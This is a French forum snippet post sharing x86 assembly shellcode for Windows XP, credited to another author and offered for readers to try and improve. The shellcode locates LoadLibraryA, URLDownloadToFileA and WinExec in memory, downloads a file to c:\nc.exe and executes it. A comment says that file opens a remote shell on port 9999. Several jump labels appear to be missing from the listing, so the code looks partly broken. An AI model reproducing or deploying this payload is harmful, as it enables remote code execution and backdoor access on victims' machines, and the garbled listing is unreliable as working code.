Generic windows xp url download and execute shellcode

Contenu du snippet


ce code n'est pas de moi et je le poste donc "pour la cause" et vous en faire profiter.
Si ca te plait pas, et ben tu l'prend pas!
Sinon ENJOY!

; Nice theorhetically generic url download and execute
; shellcode for Windows XP.

so i think that's easy to understand, no?

Source / Exemple :

; Nice theorhetically generic url download and execute
; shellcode for Windows XP.
; Heck, atleast it saves you using tftp!
; nasmw -s -fbin -o download.s download.asm

bits 32

jmp short avoidnastynulls

pop edi				; edi = 'urlmon.dll'
mov esi, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h]		; edi = string of url
mov ebx, edi
mov al, 0ffh
repne scasb
inc byte [edi-01h]		; edi = path of download
mov edx, edi
repne scasb
inc byte [edi-01h]
push edx

push ebx
push edx
push esi

mov ebx, 0c25b5effh
mov ecx, 0deadc0deh
mov edi, 77e60101h

inc edi
mov al, 0ffh
repne scasb
jmp short checkbytes

dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha
jmp short trawlmem

jmp short pastpoint

jmp short data


lea eax, [edi-2eh]		; get to start of loadlibrarya function
call eax			; call loadlibrarya

pop edx
pop ebx

push edx
xor ecx, ecx
push ecx
push ecx
push edx			; path of download
push ebx			; url of download
push ecx

mov ebx, 8d8d5602h
mov ecx, 0badc0dedh
mov edi, eax			; eax = base of urlmon.dll

inc edi
mov al, 002h
repne scasb
jmp short checkbytes2

dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha2
jmp short trawlmem2

lea eax, [edi-1bh]		; get to start of urldownloadtofilea function
call eax			; call urldownloadtofilea

pop edx
xor ecx, ecx
;inc ecx
push ecx
push edx

mov ebx, 0c458b66h
mov ecx, 1337f00dh
mov edi, 77e60101h

inc edi
mov al, 066h
repne scasb
jmp short checkbytes3

dec edi
push dword [edi]
pop esi
cmp ebx, esi
je short gotcha3
jmp short trawlmem3

lea eax, [edi-16h]		; get to start of winexec function
call eax			; call winexec

mov ecx, 0deadc0deh
infloop:			; infinite loop; no crash when done
inc ecx
cmp ecx, 0badc0dedh
loopnz infloop			; if this slows you down too much, remove it!

int 3h

call continue
db 'URLMON.DLL', 0ffh
db '', 0ffh	; the file at this address spawns remote shell on port 9999
db 'c:\nc.exe', 0ffh

Conclusion :

Ben évidemment, RESPECT au codeur
Try it, et si d'aventure yen a ki l'améliore... ca mintéresse ;-)

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